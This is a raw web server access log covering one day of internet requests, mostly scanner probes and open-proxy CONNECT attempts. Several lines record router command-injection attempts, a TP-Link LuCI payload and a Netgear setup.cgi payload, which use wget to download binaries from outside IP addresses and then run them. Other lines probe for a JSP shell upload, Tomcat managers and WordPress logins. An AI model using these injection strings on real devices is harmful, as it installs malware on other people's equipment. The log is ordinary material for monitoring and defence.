185.36.81.40 - - [22/Apr/2024:00:28:53 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.25 - - [22/Apr/2024:00:37:17 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 124.89.86.159 - - [22/Apr/2024:00:47:53 +0200] "GET / HTTP/1.1" 400 771 118.193.36.56 - - [22/Apr/2024:01:05:59 +0200] "-" 400 1930 118.193.36.56 - - [22/Apr/2024:01:06:10 +0200] "GET / HTTP/1.1" 200 1895 118.193.36.56 - - [22/Apr/2024:01:06:29 +0200] "GET /favicon.ico HTTP/1.1" 404 729 118.193.36.56 - - [22/Apr/2024:01:06:29 +0200] "GET /robots.txt HTTP/1.1" 404 728 118.193.36.56 - - [22/Apr/2024:01:06:30 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 205.210.31.185 - - [22/Apr/2024:01:19:32 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.52 - - [22/Apr/2024:01:25:09 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 128.199.52.28 - - [22/Apr/2024:01:42:03 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [22/Apr/2024:01:45:40 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 157.10.53.163 - - [22/Apr/2024:02:07:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 221.122.67.75 - - [22/Apr/2024:02:40:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:02:48:03 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:02:48:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:02:48:07 +0200] "GET /favicon.ico HTTP/1.1" 404 729 78.108.177.51 - - [22/Apr/2024:03:04:21 +0200] "GET / HTTP/1.0" 200 1895 185.36.81.40 - - [22/Apr/2024:04:02:55 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 71.6.158.166 - - [22/Apr/2024:04:22:34 +0200] "GET / HTTP/1.1" 200 1895 71.6.158.166 - - [22/Apr/2024:04:22:35 +0200] "GET /favicon.ico HTTP/1.1" 404 729 107.172.62.104 - - [22/Apr/2024:04:26:31 +0200] "PUT /poc.jsp/ HTTP/1.1" 405 694 87.121.69.25 - - [22/Apr/2024:04:28:47 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 91.92.245.67 - - [22/Apr/2024:05:00:36 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 87.120.84.130 - - [22/Apr/2024:05:21:38 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 172.105.77.209 - - [22/Apr/2024:05:41:16 +0200] "-" 400 1930 216.218.206.125 - - [22/Apr/2024:05:56:39 +0200] "-" 400 1930 167.94.145.100 - - [22/Apr/2024:06:02:55 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.100 - - [22/Apr/2024:06:02:59 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.100 - - [22/Apr/2024:06:02:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.242.226.25 - - [22/Apr/2024:06:43:30 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.119 - - [22/Apr/2024:07:19:05 +0200] "GET / HTTP/1.1" 200 1895 64.62.156.121 - - [22/Apr/2024:07:19:17 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.156.109 - - [22/Apr/2024:07:19:27 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.156.110 - - [22/Apr/2024:07:19:33 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 87.121.69.52 - - [22/Apr/2024:07:21:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 61.3.80.12 - - [22/Apr/2024:07:25:30 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [22/Apr/2024:07:25:34 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 80.94.92.60 - - [22/Apr/2024:07:37:52 +0200] "-" 400 1930 138.68.224.69 - - [22/Apr/2024:07:39:02 +0200] "POST /wp-login.php HTTP/1.1" 404 730 138.68.224.69 - - [22/Apr/2024:07:39:03 +0200] "POST /wordpress/wp-login.php HTTP/1.1" 404 744 172.105.246.139 - - [22/Apr/2024:08:21:28 +0200] "GET / HTTP/1.0" 200 1895 172.105.246.139 - - [22/Apr/2024:08:21:34 +0200] "GET / HTTP/1.1" 200 1895 172.105.246.139 - - [22/Apr/2024:08:21:34 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 740 172.105.246.139 - - [22/Apr/2024:08:21:35 +0200] "GET /nmaplowercheck1713766894 HTTP/1.1" 404 742 172.105.246.139 - - [22/Apr/2024:08:21:35 +0200] "POST /sdk HTTP/1.1" 404 721 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /Portal0000.htm HTTP/1.1" 404 732 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /pools/default/buckets HTTP/1.1" 404 747 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET / HTTP/1.0" 200 1895 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /.git/HEAD HTTP/1.1" 404 731 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 747 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "-" 400 1930 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /rest/applinks/1.0/manifest HTTP/1.1" 404 756 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /__Additional HTTP/1.1" 404 730 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /pools HTTP/1.1" 404 723 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /HNAP1 HTTP/1.1" 404 723 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 739 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 737 172.105.246.139 - - [22/Apr/2024:08:21:45 +0200] "GET /server-status HTTP/1.1" 404 731 172.105.246.139 - - [22/Apr/2024:08:21:55 +0200] "-" 400 1930 87.121.69.25 - - [22/Apr/2024:08:37:29 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 113.200.137.64 - - [22/Apr/2024:08:41:09 +0200] "GET / HTTP/1.1" 400 771 194.169.175.40 - - [22/Apr/2024:08:44:52 +0200] "-" 400 1930 179.43.190.218 - - [22/Apr/2024:08:50:11 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 80.94.92.60 - - [22/Apr/2024:10:19:25 +0200] "-" 400 1930 152.32.249.95 - - [22/Apr/2024:10:27:13 +0200] "-" 400 1930 152.32.249.95 - - [22/Apr/2024:10:27:23 +0200] "GET / HTTP/1.1" 200 1895 152.32.249.95 - - [22/Apr/2024:10:27:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729 152.32.249.95 - - [22/Apr/2024:10:27:43 +0200] "GET /robots.txt HTTP/1.1" 404 728 152.32.249.95 - - [22/Apr/2024:10:27:43 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 206.168.32.3 - - [22/Apr/2024:11:09:47 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:11:09:51 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:11:09:51 +0200] "GET /favicon.ico HTTP/1.1" 404 729 198.199.98.149 - - [22/Apr/2024:12:37:10 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.70 - - [22/Apr/2024:12:43:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 179.43.190.218 - - [22/Apr/2024:12:51:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 205.210.31.196 - - [22/Apr/2024:12:54:11 +0200] "-" 400 1930 205.210.31.196 - - [22/Apr/2024:12:54:11 +0200] "-" 400 1930 87.121.69.52 - - [22/Apr/2024:13:02:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 192.241.196.75 - - [22/Apr/2024:13:26:05 +0200] "GET /manager/text/list HTTP/1.1" 401 2499 206.168.32.3 - - [22/Apr/2024:13:27:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:13:27:26 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:13:27:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.36.81.40 - - [22/Apr/2024:13:44:58 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 180.149.125.159 - - [22/Apr/2024:13:50:41 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [22/Apr/2024:13:56:33 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 81.178.215.136 - - [22/Apr/2024:14:15:13 +0200] "GET / HTTP/1.1" 200 1895 195.140.227.163 - - [22/Apr/2024:14:23:16 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [22/Apr/2024:14:23:16 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 195.140.227.163 - - [22/Apr/2024:14:24:22 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [22/Apr/2024:14:24:22 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 195.140.227.163 - - [22/Apr/2024:14:25:28 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [22/Apr/2024:14:25:28 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 71.6.232.25 - - [22/Apr/2024:14:34:40 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.127 - - [22/Apr/2024:15:00:55 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.127 - - [22/Apr/2024:15:00:58 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.127 - - [22/Apr/2024:15:00:58 +0200] "GET /favicon.ico HTTP/1.1" 404 729 192.241.231.51 - - [22/Apr/2024:15:24:53 +0200] "GET /manager/html HTTP/1.1" 401 2499 128.199.137.235 - - [22/Apr/2024:15:44:17 +0200] "POST /wp-login.php HTTP/1.1" 404 730 128.199.137.235 - - [22/Apr/2024:15:44:18 +0200] "POST /wordpress/wp-login.php HTTP/1.1" 404 744 104.211.2.187 - - [22/Apr/2024:16:00:17 +0200] "POST /wp-login.php HTTP/1.1" 404 730 104.211.2.187 - - [22/Apr/2024:16:00:17 +0200] "POST /wordpress/wp-login.php HTTP/1.1" 404 744 206.168.34.125 - - [22/Apr/2024:16:25:24 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.125 - - [22/Apr/2024:16:25:27 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.125 - - [22/Apr/2024:16:25:28 +0200] "GET /favicon.ico HTTP/1.1" 404 729 45.156.128.43 - - [22/Apr/2024:16:38:32 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.70 - - [22/Apr/2024:16:40:57 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 185.36.81.40 - - [22/Apr/2024:16:53:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.191.126.213 - - [22/Apr/2024:17:05:49 +0200] "GET / HTTP/1.1" 200 1895 84.54.51.13 - - [22/Apr/2024:17:06:35 +0200] "-" 400 1930 78.108.177.51 - - [22/Apr/2024:17:32:23 +0200] "GET / HTTP/1.0" 200 1895 87.121.69.25 - - [22/Apr/2024:17:33:21 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 213.232.87.232 - - [22/Apr/2024:17:39:31 +0200] "GET / HTTP/1.1" 200 1895 91.92.245.67 - - [22/Apr/2024:18:23:43 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 59.183.127.10 - - [22/Apr/2024:18:35:51 +0200] "GET / HTTP/1.1" 200 1895 80.94.92.60 - - [22/Apr/2024:18:59:20 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;wget+http://94.156.79.129/mips;chmod+777+mips;./mips+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1" 404 727 179.43.190.218 - - [22/Apr/2024:19:01:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 756 3.239.82.142 - - [22/Apr/2024:19:17:19 +0200] "POST /wp-login.php HTTP/1.1" 404 730 3.239.82.142 - - [22/Apr/2024:19:17:20 +0200] "POST /wordpress/wp-login.php HTTP/1.1" 404 744 87.121.69.52 - - [22/Apr/2024:19:19:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 84.54.51.13 - - [22/Apr/2024:19:22:17 +0200] "CONNECT i0.hdslb.com:80 HTTP/1.1" 400 804 87.121.69.25 - - [22/Apr/2024:20:22:46 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 195.140.227.163 - - [22/Apr/2024:20:31:56 +0200] "GET /tomcat.jsp HTTP/1.1" 404 728 195.140.227.163 - - [22/Apr/2024:20:31:56 +0200] "GET /dr/tomcat.jsp HTTP/1.1" 404 735 34.140.130.61 - - [22/Apr/2024:20:48:33 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [22/Apr/2024:21:43:16 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804 198.235.24.48 - - [22/Apr/2024:22:44:08 +0200] "GET / HTTP/1.0" 200 1895 91.238.181.16 - - [22/Apr/2024:23:02:49 +0200] "-" 400 1930 206.168.32.3 - - [22/Apr/2024:23:09:04 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:23:09:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.3 - - [22/Apr/2024:23:09:07 +0200] "GET /favicon.ico HTTP/1.1" 404 729 198.235.24.164 - - [22/Apr/2024:23:15:53 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.25 - - [22/Apr/2024:23:23:55 +0200] "CONNECT api.rev.pm:443 HTTP/1.1" 400 804